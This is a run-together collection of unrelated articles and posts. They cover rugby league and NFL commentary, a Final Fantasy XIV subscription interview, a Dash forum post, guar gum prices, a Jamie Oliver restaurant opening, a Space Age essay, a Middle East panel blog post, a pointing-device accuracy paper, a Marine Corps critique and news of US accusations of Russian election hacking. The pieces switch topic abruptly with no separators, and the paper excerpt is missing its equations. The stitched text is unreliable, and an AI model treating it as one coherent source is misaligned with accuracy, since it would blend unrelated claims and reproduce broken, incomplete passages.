The Tigers had nine fewer sets, ran for 300 fewer metres, made 14 fewer offloads, missed more tackles, lost the penalty count 8-2 and still won very comfortably 34-26.
It was only two late consolation tries that made the score-line look respectable.
"Penrith had a lot of sets at our line. They had something like 27 plays in our 20 [metre zone] compared to us having eight in theirs," Wests Tigers coach Jason Taylor said.
"We won the game because we defended that really well. We got some points that we needed, but it was about defence and we're really pleased with that."
Rugby league might be a simple game, but you need to do a lot more than just hold the ball and complete your sets to win in the NRL Telstra Premiership.
These fundamental stats might be important, but there is a lot more going on than meets the eye.
Is any lead safe?
If Round 17 taught us anything, it is that no lead is safe in the NRL in the modern era. The Roosters and Panthers both led by 12 and got rundown, the Sharks trailed the Eels by 18 points and found a way to win, while the Knights led the Raiders 22-0 and still it wasn't enough.
It has made for some compulsive viewing over the weekend. Never has 'playing the whole 80' meant so much.
Will Cronulla's streak end?
The Sharks' incredible comeback victory over the Eels was a club record 12th win in a row. They only play two top eight sides in their final nine games – the Raiders in Round 22 and the Storm in Round 26 - and look favourites to take out the J.J. Giltinan Shield.
They'll be heavy favourites in all of those games except maybe the last game of the regular season when the clash with Melbourne. Only time will tell if that preparation will help or hinder them in their quest to win the club's maiden Premiership.
The Sharks' run home: Panthers (9), Roosters (15), Knights (16), Titans (11), Dragons (10), Raiders (6), Roosters (15), Storm (2).
The short kick-off
There were two successful short kick-offs in the space of one minute in a thrilling end to the Raiders' clash with Newcastle at GIO Stadium. When Blake Austin landed a field goal in the 79th minute the game looked over, until Newcastle got the ball back from a short kick-off giving Trent Hodkinson a chance to level the scores. The noted marksmen didn't waste his chance.
The Raiders then responded with a short kick-off of their own, which gave them one last opportunity to win the game in regulation time. While they would have to wait until extra-time to get the victory, the short kick-off worked successfully both times.
It would be interesting to see a team in the NRL use the tactic more often. The reward far outweighs the risk in my opinion.
Slater lends a hand
There may be speculation about Billy Slater's future, but you can't question his heart. The Storm superstar was ruled out for the season with a shoulder injury and is still hoping to play again in 2017, but in the meantime, he is doing great things in the community.
The post on his social media accounts attracted over 190,000 interactions (likes, shares, comments and retweets).
Square Enix believes that a subscription model is a better long term solution than free-to-play for supporting a massively multiplayer online games like Final Fantasy XIV Online: A Realm Reborn.
"A lot of games look at the first two months of subscription numbers, think that's not going to be a feasible business, and switch over to free-to-play,” producer on Final Fantasy XIV: A Realm Reborn Naoki Yoshida told GamesIndustry International. “I don't think it's necessarily because free-to-play is a better form, though. It's more about people making a rash decision to switch over and chase a quick buck."
Yoshida explained that subscription-based route provides a stable flow of income that allows Square Enix to keep good developers on staff, who can update the game and make it better. He added that players might not like paying for subscriptions, but that with free-to-play, developers need to design content with potential revenue sources in mind. “It brings up a question of who we're making happy in the end," Yoshida said.
Final Fantasy XIV Online: A Realm Reborn will be released for PlayStation 4 on April 14. For more information on the game, check out GameSpot's review of the PC version.
hi guys, long-time lurker, first-time poster.
I'm wondering if Evan could be referring to a change to a proof-of-stake algorithm, probably using masternodes. The entire masternode system sounds similar to Proof-of-Casper, Ethereum's proof-of-stake algorithm that doesn't exist yet. Basically in PoC a group of nodes each put down 1000 coin, and if they start falsifying transactions, they risk losing that 1000.. This is better than peercoin's proof-of-stake where there's no risk to falsifying transactions. And since masternodes already put down 1000 (in fact, from now on I will describe PoC as a masternode system built on PoS, since the masternodes came first) something like this seems well-suited for Dash's community. If you have no idea what Im garbling on about, this reddit post describes the difference between PoS and PoW pretty well. I can't post links yet though so you'll have to add the reddit domain before it /r/Bitcoin/comments/3xafis/marc_andreessen_big_companies_desperately_hoping/cy7hj0j
The reason it can't be a simple rotating door of PoW is that no crypto can really scale with a PoW algorithm. PoW uses too much energy for it to be a useful worldwide currency, and probably won't scale for processing transactions at a super fast rate. For the fastest transaction times + limited energy wastage + after following Evan's ingenuity for several months, I'm guessing there will be either a proof-of-stake switch, or some kind of masternode/proof-of-stake hybrid, to be put on the roadmap for two years from now. It also explains why he would "hint' at something and give a bunch of reasons for it without saying what it was, so as not to disturb the waters in this precious Oasis.
And no, though I'm a new account, i'm not a paid shill or whatever. i dont know what my angle would be if i was even. i bought in at $2.20, kept about 700 dash for a bit, sold it earlier this week. However, after reading this announcement, am probably going to half my Ethereum balance to run a masternode or two. I live a double life as a speculator andfrom a price standpoint, a PoS announcement would definitely drive in speculation. Glad I got here first.
Click to expand...
The 49ers once had the best linebacking duo in the NFL when All-Pros Patrick Willis and NaVorro Bowman were making tackles all over the field.
But ever since Patrick Willis retired in 2015 and Bowman sustained his career altering knee injury in the 2013 playoffs, things haven't been the same. To compound things, Bowman is rehabbing from an Achilles tear suffered Week 4 that puts his start of next season in jeopardy.
It's no surprise the 49ers' once-elite defense is now dead last in both scoring and yardage in Chip Kelly's first season as coach. Improving the middle of the defense will be a mandate this spring.
Bleacher Report's NFL draft guru Matt Miller posted his latest mock draft this week, projecting San Francisco to fortify its defense with the best inside linebacker available with the second-overall pick: Alabama's Reuben Foster.
Foster recently won the 2016 Butkus Award given to the nation's top linebacker for his work in Nick Saban's vaunted defense.
Foster would be a great addition to the heart of San Francisco's defense that badly needs an upgrade at inside linebacker. Michael Wilhoite and Nick Bellore haven't played well replacing Bowman and Ray-Ray Armstrong, while Gerald Hodges has struggled to seize an every-down role.
ESPN's draft expert Mel Kiper wrote about Foster this week:
He could be the best of the stellar group of Crimson Tide inside linebackers to be picked in the first round recently (Rolando McClain, Dont'a Hightower and C.J. Mosley). Foster is a complete player. Top five isn't out of the question, which is rare for an ILB. He's that good.
Related Uninspiring QB class creates questions for 49ers atop NFL draft
Foster looks like a slam-dunk pick for San Francisco, but they also did well in the second round of the mock. Miller's projection had the 49ers landing Clemson's Deshaun Watson, considered by many the top quarterback available.
Watson's athleticism and skill set would fit well within Kelly's offense if Kelly is back for a second season. But there are questions about Watson's ability to read defenses and throw accurately, which is why his draft stock dipped this season.
But Watson takes on Ohio State in the College Football Playoff and could enhance his standing with a good performance against arguably the best secondary in the country.
There's no question the 49ers need to improve the middle of their defense and find a quarterback early in the draft. Taking Foster second overall and landing Watson round two look like great decisions for San Francisco.
Guar gum, a galactomannan from the seed kernel of the guar plant Cyamopsis tetragonoloba, is used as a thickener and stabiliser in baked goods as well as in a range of other food products including ice-cream, sauces and beverages.
Some 80 per cent of the world's supply hails from India, with Pakistan the next biggest supplier.
Guar has traditionally been readily available to the food industry and always at cost effective prices. But demand from oilfields for the hydrocolloid is continuing to push prices up, according to IMR International's Quarterly Review of Food Hydrocolloids.​​
Guar gum is used in hydraulic fracturing. Another hydrocolloid, xanthan gum, too, is in high demand for use in oilfields.
“For the last 6 to 9 months, guar prices have been increasing dramatically. Supply has been unable to meet demand,”​ reports IMR International's hydrocolloid expert Dennis Seisun.
He said that previously guar prices seldom went above $0.90/lb (Euro 1.40/kg) and were often below $0.50/lb (Euro 0.80/kg.
"Unheard of requirements by sellers"​
“The situation for guar has changed dramatically. Current prices are over $2.50/lb (Euro 3.90/kg) and continue to increase on a regular and frequent basis. ​
Buyers are faced with allocation of supply and unheard of requirements by sellers, such as 'pay in advance'. For now, there seems no end in sight to the high prices and tight supply of guar," ​said the expert.
High energy prices, remarks Seisun, mean the oilfield industry can afford more in its quest for higher yields.
Some observers had expected guar prices to stabilize and drop back to around $1.00/lb (Euro 1.60/kg) by early 2012.
“Any bets based on that premise have been lost,” ​commented Seisun. “Major buyers of food grade guar are faced with prices around $2.50/lb for delivery in the first quarter 2012, and even then, they cannot buy all volumes required.”​​
The possibility the oilfield industry will find an alternative to guar is another premise: “In this case, one would see a decline even more rapid than the increases we have seen. So far, however, there is no hint that a suitable replacement has been found​,” said the consultant.
Raw material prices ​
While a range of hydrocolloid raw materials have undergone price increases in recent months, “some are steady this quarter, having already increased significantly in the last 12 to 18 months,”​ he added.
He notes that “only locust bean gum defies the general trend and remains at what many believe are unsustainably low price levels.”​
​
JACKSONVILLE, Fla. -- Nobody would blame Jacksonville Jaguars quarterback Blake Bortles if he were to start gloating.
He's the NFL's highest-rated quarterback in December, helped the Jaguars (10-4) clinch their first playoff berth since 2007 and is playing the best football of his career. He finally looks the way a No. 3 overall draft pick is supposed to look.
So he would be perfectly justified if he told everyone who has ripped, mocked, insulted, criticized or berated him to kiss his ... foot.
He won't, though. He won't even acknowledge what they've said -- other than an occasional funny one-liner in a news conference. It's just a lost cause, the 25-year-old is not going to bother with it because it doesn't really matter, anyway.
"I think when you spend time or when you spend brain space of saving all that information and all those guys that have said bad things about you, it's a waste of time," Bortles said. "It's a waste of space. It's a waste of thinking about that stuff.
"I have a couple people that I have to prove right for putting me in the position that I'm in, and as long as I'm doing that and we're finding ways to move the ball and score points, I'm happy with what I'm doing and where I'm at.”
Blake Bortles has dodged verbal barbs and opposing pass-rushers to get the Jaguars to the playoffs. Kim Klement/USA TODAY Sports
Bortles has been fantastic in December: 903 yards, 71.4 percent completions, seven touchdowns, no interceptions and an NFL-high 128.6 passer rating. More importantly, the Jaguars are 3-0 and can win the AFC South this Sunday by beating San Francisco (4-10) or if Tennessee loses to the Los Angeles Rams.
That's certainly not "trash," which is how Houston defensive end Jadeveon Clowney referred to Bortles after Bortles threw for 326 yards and three touchdowns in the Jaguars' 45-7 victory in Week 15. Bortles isn't playing like a "subpar quarterback," which is how Seattle safety Earl Thomas described Bortles after Bortles threw for 268 yards and two touchdowns in the Jaguars' 30-24 victory.
The day before Bortles' hot streak began against Indianapolis, the website Deadspin.com poked fun at Bortles with a video of the halftime contest at the SEC championship game. It showed a contestant trying to throw footballs into a hole in a giant Dr. Pepper can from 5 yards away. The man was tossing the footballs two-handed from his chest, and the headline on the post was "Give it up, Blake Bortles."
Earlier this season, Cincinnati linebacker Vontaze Burfict said the Bengals' defensive game plan for their Nov. 5 meeting against Jacksonville was to stop the Jaguars' run game because “obviously [Leonard] Fournette can beat you and I'm not sure Blake can beat us. We want to put it in his hands and have him beat us, if he can.”
Fournette missed the game because of a violation of team rules, but Bortles threw for 259 yards and a touchdown in the Jaguars' 23-7 victory.
"People are always going to say things about you," Jaguars coach Doug Marrone said. "What is that saying, 'Sticks and stones may break my bones, but names will never hurt me?' My grandmother taught me [that]."
Yeah, well, Bortles was getting hit by tree trunks and boulders throughout the offseason. New Orleans defensive end Cameron Jordan took a shot at Bortles during an interview with SiriusXM NFL Radio when he talked about how much practicing against Drew Brees helped the defense.
"It's not like we're going against Blake Bortles here," he said. "It's not like Drew is giving picks away."
That criticism was on the mark, though. Bortles threw the second-most interceptions of any quarterback from 2014 to 2016 (51, one behind Philip Rivers). He led all players in those three seasons with 63 turnovers, too.
His 2016 season was a disaster. His mechanics deteriorated to the point where his college offensive coordinator didn't recognize him, he threw 16 interceptions (including three pick-sixes), and the Jaguars won just three games. One of Bortles' turnovers came when he tried to throw the ball into the dirt because a screen pass was covered but the ball bounced off T.J. Yeldon's foot and Houston linebacker Whitney Mercilus caught the rebound.
Video of that play went viral pretty quickly and Bortles was a laughingstock for a couple weeks.
By the end of the season, Bortles was admittedly somewhat of a mental mess. He said it was hard for him to look his teammates in the eyes because he let them down over and over.
The media piled on, too, with videos and stories and analysis of Bortles' mechanics, his terrible decision-making, and ripping general manager Dave Caldwell for drafting Bortles third overall in 2014. Analytics pieces showed how bad Bortles was, and there was speculation that he wouldn't last the 2017 season as the team's starter.
Then came a five-interception practice early in training camp, being pulled from a practice days later, and Marrone opening up the quarterback job after Bortles' dismal performance in the second preseason game. Things really got wild then.
Bortles won the job back, and slowly but surely won his teammates back, too, over the course of the season. He's playing the best football of his career, and that makes the Jaguars a dangerous team because of their top-ranked run game and a defense that leads the NFL in points allowed, sacks and takeaways.
"I'd like to say I've felt the same all year long. I think obviously the results and numbers have been a little better here recently, obviously," Bortles said. "I feel good, feel the same. Don't feel so pressed or trying to do more than I have in the past. I think guys are making really good plays and helping me look good.
NFL Playoff Machine See what the latest playoff picture looks like and simulate your own playoff scenarios.
NFL Playoff Machine
"It's definitely been, I think, a process, and it is for me just like we talk about it each week for Dede [Westbrook] and Keelan [Cole] getting more comfortable within the offense. I'm in the same boat. We're all in it for the first year, and each week you feel better or are a little bit better about the plan, better about the stuff you are doing. More comfortable and confident within it all, and that allows you to just go out and play free and have a clear, free mind."
But while Bortles won't gloat, his teammates will.
"It's sad, man, because the teams that are speaking about it, he's just got done shredding them," safety Tashaun Gipson said. "What he did to the Houston Texans, they should have arrested him for that, man. Dude was throwing off his back foot and making throws I've never seen before. What he did to Seattle? I would like to think those guys were speaking out of frustration.
"Obviously, guys are going to say some things like that, but you look back at it and you say, man, it's not what he's been doing, it's what he's doing now. He's playing good football. Again, he's making those guys eat those words, and I'm happy for him."
Bortles has been getting a lot of love nationally during his recent hot streak, especially from NFL Network's Deion Sanders ("I believe in Blake Bortles") and ESPN's Ryan Clark (who apologized for his harsh criticism). However, there's also an element of wondering if the past three weeks are the aberration and the real Bortles is closer to what we've seen the first three years of his career.
"People are always going to remember that, especially since there's a lot of people that don't watch our games," receiver Allen Hurns said. "That's what Blake's going to be known for until he accomplishes something big, like if we win the Super Bowl or anything like that. Blake has done a great job just tuning some of the things out and continuing to play, have his head down and not worry what everybody else is going to say.
"If he was paying attention to what everybody else is saying, it would have crushed him by now."
British celebrity chef Jamie Oliver will be opening the first North American location of his restaurant chain Jamie's Italian in Toronto.
Oliver has partnered with Toronto's King Street Food Company, owners of Buca and Jacobs & Co. Steakhouse, to bring his brand of cuisine to Yorkdale Shopping Centre in spring 2015.
Buca has been rated the best restaurant in Toronto by Post City Magazine critic Joanne Kates and was also treated to praise by Oliver himself, who took to Twitter to call his experience there in 2011 his "favourite meal of the year."
Oliver opened the first location of Jamie's Italian in 2008 and has since expanded to 35 outlets across the United Kingdom and eight internationally. The menu includes classics such as pastas and pizzas and Oliver's own twists on Italian such as lamb lollipops.
Oliver has become a household name in promoting sustainable and healthy foods since starring in BBC's The Naked Chef, later becoming familiar to North American audiences with Food Network shows like Jamie at Home.
He partnered with Canadian grocer Sobey's last year to offer a line of products aimed at getting Canadians to eat high quality foods.
In retrospect, it was an unlikely set of conditions that came together to produce the Space Age. Not just the postwar blend of prosperity and paranoia, but a series of scientific breakthroughs, both pure and applied, that happened in such close succession that we nearly had a surplus, one that had to be invested in something.
We had to know our world well enough to be able to escape it, but not so well that we couldn't ignore the price we were paying. And now that window may be closing.
Here are two stories that have me in an elegiac mood. “This Used To Be the Future” is a photoessay by Rachel Sussman that looks at NASA's Ames Research Center in Silicon Valley. Most stories about Ames focus on the cutting edge stuff, the public/private partnerships; Sussman focuses on the old stuff, the military leftovers, the junk.
Next is a piece in Scientific American on plutonium-238. NASA uses the slow-burning plutonium to power its long-range probes and interplanetary craft.
Over the past half-century, NASA has used a total of 140 kilograms of Pu-238 to push the frontiers of exploration. Coupled to one of the agency's “thermoelectric” generators that convert heat into electricity, four kilograms of the stuff can power a spacecraft for decades. Pu-238 was used in Apollo-era science experiments on the Moon, in the Galileo mission to Jupiter and in the Pioneer and Voyager space probes now exiting our solar system. Hefty hunks of Pu-238 power the Mars Curiosity rover, the Cassini orbiter at Saturn and the New Horizons spacecraft now roaming beyond Pluto. In the future, Pu-238 could power robotic probes to burrow beneath the ice of ocean-bearing moons, planes to fly in the alien atmospheres of other worlds, ships to sail the liquid ethane seas of Saturn's moon Titan and much, much more. Those future missions can only occur if there's enough plutonium to go around. Practically all of NASA's Pu-238 stockpile was made as a byproduct of building nuclear weapons during the Cold War. As the Cold War wound down, so too did the Department of Energy's Pu-238 production; it made its last batch in 1988, shutting off NASA's supply save for occasional deliveries of small, lower-quality batches from Russia that ceased in 2010. At present, only about 35 kilograms of Pu-238 are left for the space agency, and radioactive decay has rendered all but 17 kilograms too weak to be readily used in NASA's thermoelectric generators. NASA and DOE officials estimate there is only enough for four more generators, one of which is already committed to NASA's upcoming Mars 2020 rover.
The plutonium shortfall makes it impossible for NASA to plan future missions that would require it, but in the absence of specific mission needs, nobody wants to make any more. Solar-powered craft could eventually fill in the gap, but the technology's not there yet.
So the stars get further and further away.
Jonathan Hickman is currently writing Secret Wars for Marvel, but the roots of that story go back to his earlier run on Fantastic Four. There's a great scene where Reed Richards, Mister Fantastic, resigns from the Singularity Conference (think TED/O'Reilly/Davos on steroids), a group of scientists he founded, as they argue for increasingly limited approaches to exploration.
The other scientists are basically correct. It is irresponsible to fund manned space missions in a global recession. Our global population may be impossible to sustain on our planet going forward. But Mister Fantastic, being a superhero, rejects the premise. “The future of man is not one billion of us fighting over limited resources on a soon-to-be-dead planet, but one trillion human beings spanning an entire galaxy,” he says. “The future of man is not here. It is out there. Because it's our new horizon. Because it's what's next.”
It's a corny, Sorkin-esque speech…. but I love it. It thrills me. And it makes me afraid.
I would like to think that that time isn't over yet, that there is a way to reconcile what we know now with what we were willing to risk for the sake of knowledge then — that if not in outer space, then in medicine or genetics or some other field. But part of me wonders if the time for us to come together to do big things — that space age, that Marvel Age, that time of the Fantastic Four — is over. And all that's left is how we manage our decline.
On December 19th the Potomac Institute had a panel on the role of religion in combating terrorism that was broadcast later on CSPAN. There was a lot of Islam-bashing on this panel. Yonah Alexander of the Potomac Institute lumped Hamas and the murderous synagogue attack in Jerusalem in with ISIS. Robert Eisen, a religion professor at George Washington University, said, “We're mainly speaking about Islamic terrorism,” in which violence against enemies has a “spiritual and transcendent purpose.” Rabbi Stuart Weinblatt also said that terrorism is mostly a Muslim problem in our time.
After 105 minutes, the ambassador of the Arab League to the United States was invited from the audience to speak. Mohammed Al Hussaini Al Sharif said that religion is not a source of violence, state policies foster violence, including Israel's “occupation.” The Islamic terrorism described by the panel makes it “all the more imperative to resolve the Israeli/Palestinian conflict…This is one of the major causes of instability and insecurity in the region.”
Al Sharif then quoted from the speech by Secretary of State John Kerry on Eid al-Ahda, October 16. Kerry:
As I went around and met with people in the course of our discussions about the ISIL coalition, the truth is we – there wasn't a leader I met with in the region who didn't raise with me spontaneously the need to try to get peace between Israel and the Palestinians, because it was a cause of recruitment and of street anger and agitation that they felt – and I see a lot of heads nodding – they had to respond to. And people need to understand the connection of that. And it has something to do with humiliation and denial and absence of dignity, and Eid celebrates the opposite of all of that.
Al Sharif said the US had vetoed resolutions for Palestinian self-determination 40 times in the Security Council.
Now, what do you expect the Palestinian to react? Tell me. They resist, and they call them terrorist. If you are under occupation for 60 years, what will happen?
The ambassador's comments irritated Rabbi Weinblatt. Weinblatt heads a Conservative congregation in Maryland and is a leading supporter of Israel, the President of the Rabbinic Cabinet of the Jewish Federations of North America and former Director of Israel Policy and Advocacy for the Rabbinical Assembly. He said:
I must say that in the course of our discussion today–and we've been discussing this issue of the role of religion in combating terrorism– we've talked about incidents of terrorism in Sudan and Somalia, we've talked about what's going on in Afghanistan and Pakistan. We've talked about what's going on in Nigeria and so many parts of the world. I must say, I'm rather offended by the fact that you would even shlep in the Palestinian problem. None of those issues that we have referred to have anything whatsoever to do with the Israeli Palestinian cause. And despite what Secretary Kerry may have said, it's not relevant to the issues we have discussed today. I think we should be discussing the role of religion in combating terrorism and not just bringing in irrelevant, tertiary issues that have nothing to do with the topic at hand.
I must say I found the rabbi's comments deeply dismaying. They reflect the inability of the American Jewish leadership to even consider for an eyeblink how Israel's policies are generating suffering, resentment, resistance, and international condemnation. The Arab ambassador was speaking common sense. But the American Jewish leadership is reactionary on this question. They make John Kerry look like a radical. It is this sort of rigid authoritarian thinking that generates revolution.
MacKenzie, I. S., Kauppinen, T., & Silfverberg, M. (2001). Accuracy measures for evaluating computer pointing devices. Proceedings of the ACM Conference on Human Factors in Computing Systems - CHI 2001, pp. 9-16. New York: ACM. [software]
Accuracy Measures for
Evaluating Computer Pointing Devices I. Scott MacKenzie1, Tatu Kauppinen2, & Miika Silfverberg2 1Department of Computer Science
York University
Toronto, Ontario, Canada M3J 1P3
smackenzie@acm.org 2Nokia Research Center
P.O. Box 407
FIN-00045 Nokia Group, Finland
tatu.kauppinen@nokia.com, miika.silfverberg@nokia.com
Abstract
In view of the difficulties in evaluating computer pointing devices across different tasks within dynamic and complex systems, new performance measures are needed. This paper proposes seven new accuracy measures to elicit (sometimes subtle) differences among devices in precision pointing tasks. The measures are target re-entry, task axis crossing, movement direction change, orthogonal direction change, movement variability, movement error, and movement offset. Unlike movement time, error rate, and throughput, which are based on a single measurement per trial, the new measures capture aspects of movement behaviour during a trial. The theoretical basis and computational techniques for the measures are described, with examples given. An evaluation with four pointing devices was conducted to validate the measures. A causal relationship to pointing device efficiency (viz. throughput) was found, as was an ability to discriminate among devices in situations where differences did not otherwise appear. Implications for pointing device research are discussed. Keywords: Computer pointing devices, performance evaluation, performance measurement, cursor positioning tasks
INTRODUCTION
The pointing device most common in desktop systems is the mouse, although others are also available, such as trackballs, joysticks, and touchpads. Mouse research dates to the 1960s with the earliest publication from English, Engelbart, and Berman [6]. The publication in 1978 by Card and colleagues at Xerox PARC [4] was the first comparative study. They established for the first time the benefits of a mouse over a joystick. Many studies have surfaced since, consistently showing the merits of the mouse over alternative devices (e.g., [7, 9, 13]). This paper focuses on the evaluation of computer pointing devices in precision cursor positioning tasks. The primary contribution is in defining new quantitative measures for accuracy that can assist in the evaluations.
PERFORMANCE EVALUATION
The most common evaluation measures are speed and accuracy. Speed is usually reported in its reciprocal form, movement time (MT ). Accuracy is usually reported as an error rate - the percentage of selections with the pointer outside the target. These measures are typically analysed over a variety of task or device conditions.
An ISO standard now exists to assist in evaluating pointing devices. The full standard is ISO 9241, "Ergonomic design for office work with visual display terminals (VDTs)". Part 9 is "Requirements for non-keyboard input devices" [8]. ISO 9241-9 proposes just one performance measurement: throughput. Throughput, in bits per second, is a composite measure derived from both the speed and accuracy in responses. Specifically,
(1)
where
(2)
The term ID e is the effective index of difficulty, in "bits". It is calculated from D, the distance to the target, and W e , the effective width of the target. The use of the "effective" width (W e ) is important. W e is the width of the distribution of selection coordinates computed over a sequence of trials, calculated as
(3)
where SD x is the standard deviation in the selection coordinates measured along the axis of approach to the target. This implies that W e reflects the spatial variability (viz. accuracy) in the sequence of trials. And so, throughput captures both the speed and accuracy of user performance. See [5, 10] for detailed discussions.
NEW ACCURACY MEASURES
Figure 1. A "perfect" target-selection task
In practice, this behaviour is rare. Many variations exist and all occur by degree, depending on the device, the task, and other factors. In this section, we identify some of these behaviours and formulate quantitative measures to capture them.
We are not suggesting that it is wrong to report error rates. Rather, our goal is to augment this with more expressive measures of accuracy - measures that can assist in characterizing possible control problems that arise with pointing devices.
Movement Variability
Consider the trackball's means to effect pointer motion. To move the pointer a long distance, users may "throw" the ball with a quick flick of the index finger, whereas more precise pointer movement is effected by "walking" the fingers across the top of the ball. These behaviours, which are not possible with other pointing devices, may affect the pointer's path. Such effects may not surface if analyses are limited to movement time or error rates.
Dragging tasks are particularly challenging for trackballs. This has been attributed to an interaction between the muscle groups to effect pointer motion (index finger) vs. those to press a button (thumb) [11]. In the study cited, however, only movement times and error rates were measured. Since these are gross measures (one per trial), their power in explaining behaviour within a trial is limited. Here we see a clear need for more detailed measures that capture characteristics of the pointer's path.
Several measures are possible to quantify the smoothness (or lack thereof) in pointer movement, however analyses on the path of movement are rare in published studies. (For exceptions, see [1, 12].) One reason is that the computation is labour-intensive. The pointer path must be captured as a series of sample points and stored in a data file for subsequent analysis. Clearly, both substantial data and substantial follow-up analyses are required.
An example of a task where the path of the pointer is important is shown in Figure 2. When selecting items in a hierarchical pull-down menu, the pointer's path is important. If the path deviates too far from the ideal, a loss of focus occurs and the wrong menu item is temporarily active. Such behaviour is undesirable and may impact user performance.
Figure 2. The importance of pointer path
Several measures are now proposed to assist in identifying problems (or strengths) for pointing devices in controlling a pointer's movement path. Figure 3 shows several path variations. Note that the pointer start- and end-point are the same in each example. Clearly, accuracy analyses based only on end-point variation cannot capture these movement variations.
We begin by proposing several simple measures that require only that certain salient events are logged, tallied, and reported as a mean or ratio.
Target Re-entry (TRE ). If the pointer enters the target region, leaves, then re-enters the target region, then target re-entry (TRE ) occurs. If this behaviour is recorded twice in a sequence of ten trials, TRE is reported as 0.2 per trial. A task with one target re-entry is shown in Figure 3a.
Figure 3. Path variations. (a) target re-entry (b) task axis crossing
(c) movement direction change (d) orthogonal direction change
An example where target re-entry was not used, yet may have helped, is Akamatsu et al.'s evaluation of a mouse with tactile feedback [2]. This study found a main effect on fine positioning time - the time to select the target after the pointer entered the target region. With tactile feedback, users exhibited a lower fine positioning time than under the no feedback, auditory feedback, and colour feedback conditions. A measure such as target re-entry may also serve to reveal differences among on-target feedback conditions, for example.
Other counts of path accuracy events are possible, and may be relevant, depending on the device or task.
Task Axis Crossing (TAC ). In Figure 3b, the pointer crosses the task axis on the way to the target. In the example, the ideal path is crossed once, so one task axis crossing (TAC ) is logged. This measure could be reported either as a mean per trial or a mean per cm of pointer movement.
TAC may be valuable if, for example, the task is to trace along a pre-defined path as closely as possible.
Movement Direction Change (MDC ). In Figure 3c, the pointer's path relative to the task axis changes direction three times. Each change is logged as a movement direction change (MDC ).
MDC and TAC are clearly correlated. One or the other may be of interest, depending on the task or device.
Orthogonal Direction Change (ODC ). In Figure 3d, two direction changes occur along the axis orthogonal to the task axis. Each change is logged as one orthogonal direction change (ODC ). If this measure is substantial (measured over repeated trials), it may signal a control problem in the pointing device.
The four measures above characterize the pointer path by logging discrete events. Three continuous measures are now proposed: movement variability, movement error, and movement offset.
Movement Variability (MV ). Movement variability (MV ) is a continuous measure computed from the x-y coordinates of the pointer during a movement task. It represents the extent to which the sample points lie in a straight line along an axis parallel to the task axis.
Consider Figure 4, which shows a simple left-to-right target selection task, and the path of the pointer with five sample points.
Figure 4. Sample coordinates of pointer motion
Assuming the task axis is y = 0, y i is the distance from a sample point to the task axis, and y[overbar] is the mean distance of the sample points to the task axis. Movement variability is computed as the standard deviation in the distances of the sample points from the mean:
(4)
For a perfectly executed trial, MV = 0.
Movement Error (ME ). Movement error (ME ) is the average deviation of the sample points from the task axis, irrespective of whether the points are above or below the axis. Assuming the task axis is y = 0 in Figure 4, then
(5)
For an ideal task, ME = 0. As with MDC and TAC, ME and MV are likely correlated. One or the other may bear particular merit depending on the movement characteristics of the device.
Movement Offset (MO ). Movement offset (MO ) is the mean deviation of sample points from the task axis. Assuming the task axis is y = 0 in Figure 4, then
(6)
Movement offset represents the tendency of the pointer to veer "left" or "right" of the task axis during a movement.
For an ideal task, MO = 0. Several movement responses, and the relative values of movement variability, error, and offset are shown in Figure 5.
The corps – which likes to think of itself as the most elite of the nation's military services – finds itself grappling with Nazi SS flags, scout-snipers urinating on Taliban dead, and a young leatherneck who committed suicide after intense hazing by fellow Marines on the front lines in Afghanistan. Over at the independent Marine Corps Gazette, Captain Brett Friedman sums up what he calls a “sickness” infecting the corps:
All of these events were a failure of leadership. Every Marine involved knew that what they were doing is wrong, but they did nothing to stop it. This is a problem that a safety standown, more specific regulations, and education about morality and ethics will not fix. We have fostered a culture that takes perverse pleasure in enforcing irrelevant standards while simultaneously ignoring or enabling true misconduct. We've fostered a generation of Marines who will look at the picture of the scout snipers and see facial hair, unbloused boots, and hands in pockets before they notice Nazi propaganda. They will quickly condemn failures in appearance but will enable and defend moral failings. They will ignore and allow a Lance Corporal to be hazed and ostracized. They will join in with the desecration of bodies. These are our priorities. But at least the grass around the battalion CP will remain undisturbed by feet clad in identical socks.
The Obama administration on Friday officially accused Russia of attempting to interfere in the 2016 elections, including by hacking the computers of the Democratic National Committee and other political organizations.
The denunciation, made by the Office of the Director of National Intelligence and the Department of Homeland Security, came as pressure was growing from within the administration and some lawmakers to publicly name Moscow and hold it accountable for actions apparently aimed at sowing discord around the election.
“The U.S. Intelligence Community is confident that the Russian Government directed the recent compromises of e-mails from U.S. persons and institutions, including from U.S. political organizations,” said a joint statement from the two agencies. “. . . These thefts and disclosures are intended to interfere with the U.S. election process.”
The public finger-pointing was welcomed by senior Democratic and Republican lawmakers, who also said they now expect the administration to move to punish the Kremlin as part of an effort to deter further acts by its hackers.
“Today was just the first step,” said Sen. Ben Sasse (R-Neb.), a member of the Homeland Security Committee. “Russia must face serious consequences. Moscow orchestrated these hacks because [Russian President Vladimir] Putin believes Soviet-style aggression is worth it. The United States must upend Putin's calculus with a strong diplomatic, political, ­cyber and economic response.”
The Post's Ellen Nakashima goes over the hacking incidents and discusses the two groups responsible. (Jhaan Elker/The Washington Post)
The White House has been mulling potential responses, such as economic sanctions, but no formal recommendation to the president has been made.
The DNC publicly disclosed the intrusions in June, saying its investigation determined that Russian government hackers were behind the breach. That was followed shortly after by a major leak of DNC emails, some so embarrassing that they forced the resignation of the DNC chairwoman, Rep. Debbie Wasserman Schultz (Fla.), on the eve of the Democratic National Convention.
The administration also blamed Moscow for the hack of the Democratic Congressional Campaign Committee and the subsequent leak of private email addresses and cellphone numbers of Democratic lawmakers.
Other leaks of hacked material followed.
The digitally purloined material has appeared on websites such as DC Leaks and WikiLeaks. It has included the private emails of former secretary of state Colin Powell and aides to former secretary of state and Democratic presidential nominee Hillary Clinton.
An online persona calling himself Guccifer 2.0 has claimed responsibility for posting the material. Those sites and that persona is “consistent with the methods and motivations of Russian-directed efforts,” the joint statement said. “. . . We believe, based on the scope and sensitivity of these efforts, that only Russia's senior-most officials could have authorized these activities.”
The Kremlin on Friday dismissed the administration's accusation.
“This is some sort of nonsense,” said Dmitry Peskov, press secretary for Putin. “Every day, Putin's site gets attacked by tens of thousands of hackers. Many of these attacks can be traced to U.S. territory. It's not as though we accuse the White House or Langley of doing it each time it happens.”
Hours after the administration called out Russia, WikiLeaks released some 2,000 emails apparently hacked from the personal Gmail inbox of Clinton's campaign chairman, John Podesta. They included excerpts of speeches Clinton made to Wall Street banks that she had resisted making public. In one of them, she said that Wall Street knew best how it should be regulated. The campaign has not acknowledged the excerpts' authenticity. There was no immediate word from the FBI as to whether the Russians were behind the alleged hack.
